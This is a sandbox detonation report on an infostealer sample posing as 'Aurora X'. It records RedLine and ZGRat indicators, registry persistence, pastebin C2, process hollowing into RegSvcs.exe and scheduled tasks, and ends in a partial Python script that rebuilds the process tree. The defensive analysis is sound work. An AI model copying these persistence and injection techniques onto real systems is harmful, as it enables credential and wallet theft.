Malware Analysis Report

2024-10-16 05:21

Sample ID 240301-vbnvaaab4x
Target Aurora X [by RyosX].rar
SHA256 ba00978fa3933d128d43f7be77ecd4323284b4bdf1ac80ac0315ef09802749ae
Tags
cryptone packer redline @dxrkl0rd infostealer zgrat discovery persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba00978fa3933d128d43f7be77ecd4323284b4bdf1ac80ac0315ef09802749ae

Threat Level: Known bad

The file Aurora X [by RyosX].rar was found to be: Known bad.

Malicious Activity Summary

cryptone packer redline @dxrkl0rd infostealer zgrat discovery persistence rat spyware stealer

RedLine payload

RedLine

Detect ZGRat V1

ZGRat

CryptOne packer

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-01 16:49

Signatures

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win7-20240221-en

Max time kernel

119s

Max time network

123s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Note: regsvr32 /s silently loads the DLL and calls its DllRegisterServer export. The 64-bit regsvr32 in system32 hands a 32-bit DLL off to the SysWOW64 copy with the same arguments, which is why the process list shows two regsvr32 instances and why the WriteProcessMemory rows below pair them. The ProgIDs and CLSIDs written during registration (ShockwaveFlash.ShockwaveFlash, {D27CDB6E-AE6D-11cf-96B8-444553540000}) are the identifiers of the Adobe Flash Player ActiveX control, so scripts.dll registers itself as a Flash OCX; the IE-settings and registry-class signatures fire on that registration. Whether the DLL is a genuine Flash OCX or a lookalike is not established by this report, and no network or file activity was recorded in this detonation.

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash\application/futuresplash C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash\application/x-shockwave-flash C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB70-AE6D-11cf-96B8-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB70-AE6D-11cf-96B8-444553540000}\Compatibility Flags = "65536" C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.17\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.9\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ = "_IShockwaveFlashEvents" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\CLSID\ = "{D27CDB70-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.18\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.23\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ = "Macromedia Flash Factory Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ = "IFlashObject" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\ = "Macromedia Flash Paper" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.16 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.10\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib\ = "{D27CDB6B-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.sor\Content Type = "text/plain" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.5\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\ = "{D27CDB6B-AE6D-11CF-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll, 1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.21\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ = "IFlashObject" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\ = "Macromedia Flash Factory Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.17 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.7 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.13\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.16\ = "Shockwave Flash Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\EnableFullPage\.mfp C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.7\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\DefaultIcon C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\EnableFullPage\.swf C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2324 wrote to memory of 3024 (7 events) N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win10-20240221-en

Max time kernel

122s

Max time network

142s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4176 wrote to memory of 4360 (3 events) N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win7-20240221-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 520

Note: Aurora.exe crashed on this Windows 7 image (WerFault.exe is reporting on PID 2756), so behavioral1 captured nothing beyond the in-memory dumps listed under Files. The Windows 10 detonation (behavioral2) is the run that shows the full execution chain.

Network

N/A

Files

memory/2756-0-0x0000000000120000-0x0000000000170000-memory.dmp

memory/2756-4-0x0000000074820000-0x0000000074F0E000-memory.dmp

memory/2756-5-0x0000000074820000-0x0000000074F0E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-01 16:49

Reported

2024-03-01 16:52

Platform

win10-20240221-en

Max time kernel

132s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A (3 detections; no per-event details recorded)

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1104443672-3570440473-4052989528-1000\Software\Microsoft\Windows\CurrentVersion\Run\kwweifjdskdv = "C:\\Users\\Admin\\AppData\\Local\\kwweifjdskdv\\kwweifjdskdv.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2788 set thread context of 776 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 set thread context of 4252 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Note: SetThreadContext on a child RegSvcs.exe, paired with the repeated WriteProcessMemory calls from the same parents listed below, is the process-hollowing pattern: a legitimate, signed .NET Framework utility is started, its memory is overwritten with the payload, and its thread is redirected into it. The two RegSvcs.exe instances (PIDs 776 and 4252) are therefore the processes to dump when looking for the RedLine and ZGRat payloads; the utility itself is benign.

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe N/A
Token: SeRestorePrivilege (3 events) N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 (3 events; privilege LUID 35 is SeCreateSymbolicLinkPrivilege, which the sandbox left unnamed) N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege (6 events) N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege (2 events) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege (2 events) N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Rows are collapsed with event counts. The 7z.exe entries (SeRestore, SeSecurity, SeCreateSymbolicLink) are the privileges an archiver enables to restore file security attributes and symbolic links while extracting; the SeDebugPrivilege requests by Aurora.exe, the RegSvcs.exe instances and powershell.exe are the ones relevant to injection and credential access.

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2364 wrote to memory of 3092 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 3092 wrote to memory of 4012 (2 events) N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 4012 wrote to memory of 984 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 4012 wrote to memory of 5112 (2 events) N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 2516 (2 events) N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 3464 (2 events) N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 4012 wrote to memory of 1712 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4012 wrote to memory of 1872 (3 events) N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 2364 wrote to memory of 2788 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2788 wrote to memory of 3628 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2788 wrote to memory of 776 (8 events) N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1872 wrote to memory of 4252 (5 events) N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4252 wrote to memory of 1124 (3 events) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 208 (3 events) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 1492 (3 events) N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4252 wrote to memory of 1712 (3 events) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1224 (3 events) N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 1712 wrote to memory of 4200 (3 events) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1224 wrote to memory of 4768 (3 events) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Rows are collapsed with event counts. Two points when reading them: PID 1712 appears twice with different images (attrib.exe under cmd.exe 4012, later a SysWOW64 cmd.exe under RegSvcs.exe 4252), so the PID was reused during the run and the tree has to be read by PID and image together. The 8 writes into RegSvcs.exe 776 and 5 into RegSvcs.exe 4252, each followed by SetThreadContext from the same parent, are the injection writes; the 2 to 3 writes into every other child are consistent with ordinary process creation as this sandbox records it.
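A flattened WriteProcessMemory table is easier to read as a tree. The Python below is an added example, not part of the sandbox's output: it rebuilds the behavioral2 process tree from the source/target pairs above (copied from the table with repeat rows dropped), keys nodes by PID plus image because the run reuses PID 1712, and flags Windows binary names executing outside C:\Windows (the conhost.exe and svchost.exe copies in %TEMP%). The SYSTEM_NAMES list is this example's own choice.

```python
"""Rebuild the behavioral2 process tree from the sandbox's WriteProcessMemory rows."""
import ntpath
from collections import defaultdict

# Parent -> child writes copied from this report's behavioral2 table, one entry per
# distinct (source PID, source image, target PID, target image); repeat rows dropped.
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WRITES = [
    (2364, TEMP + r"\Aurora_V2\Aurora.exe", 3092, TEMP + r"\conhost.exe"),
    (3092, TEMP + r"\conhost.exe", 4012, r"C:\Windows\system32\cmd.exe"),
    (4012, r"C:\Windows\system32\cmd.exe", 984, r"C:\Windows\system32\mode.com"),
    (4012, r"C:\Windows\system32\cmd.exe", 5112, TEMP + r"\main\7z.exe"),
    (4012, r"C:\Windows\system32\cmd.exe", 2516, TEMP + r"\main\7z.exe"),
    (4012, r"C:\Windows\system32\cmd.exe", 3464, TEMP + r"\main\7z.exe"),
    (4012, r"C:\Windows\system32\cmd.exe", 1712, r"C:\Windows\system32\attrib.exe"),
    (4012, r"C:\Windows\system32\cmd.exe", 1872, TEMP + r"\main\Installer.exe"),
    (2364, TEMP + r"\Aurora_V2\Aurora.exe", 2788, TEMP + r"\svchost.exe"),
    (2788, TEMP + r"\svchost.exe", 3628, REGSVCS),
    (2788, TEMP + r"\svchost.exe", 776, REGSVCS),
    (1872, TEMP + r"\main\Installer.exe", 4252, REGSVCS),
    (4252, REGSVCS, 1124, r"C:\Windows\SysWOW64\cmd.exe"),
    (1124, r"C:\Windows\SysWOW64\cmd.exe", 208, PS),
    (2788, TEMP + r"\svchost.exe", 1492, PS),
    (4252, REGSVCS, 1712, r"C:\Windows\SysWOW64\cmd.exe"),
    (4252, REGSVCS, 1224, r"C:\Windows\SysWOW64\cmd.exe"),
    (1712, r"C:\Windows\SysWOW64\cmd.exe", 4200, r"C:\Windows\SysWOW64\schtasks.exe"),
    (1224, r"C:\Windows\SysWOW64\cmd.exe", 4768, r"C:\Windows\SysWOW64\schtasks.exe"),
]

# Windows binary names that malware borrows; this list is the example's own choice.
SYSTEM_NAMES = {"conhost.exe", "svchost.exe", "dllhost.exe", "cmd.exe", "regsvcs.exe"}


def build_tree(writes):
    """Return (children, roots) with nodes keyed by (PID, image).

    Keying by PID alone is wrong here: 1712 is attrib.exe under cmd.exe 4012 and,
    after the PID is reused, a SysWOW64 cmd.exe under RegSvcs.exe 4252.
    """
    children = defaultdict(list)
    targets = set()
    for spid, simg, tpid, timg in writes:
        parent, child = (spid, simg), (tpid, timg)
        if child not in children[parent]:
            children[parent].append(child)
        targets.add(child)
    roots = [node for node in children if node not in targets]
    return children, roots


def render(children, node, depth=0):
    """Indented one-line-per-process view, depth-first in first-seen order."""
    pid, image = node
    lines = [f"{'  ' * depth}{pid} {image}"]
    for child in children.get(node, []):
        lines.extend(render(children, child, depth + 1))
    return lines


def masquerades(writes):
    """Images with a Windows system-binary name running from outside C:\\Windows."""
    found = set()
    for _, simg, _, timg in writes:
        for image in (simg, timg):
            name = ntpath.basename(image).lower()
            if name in SYSTEM_NAMES and not image.lower().startswith("c:\\windows\\"):
                found.add(image)
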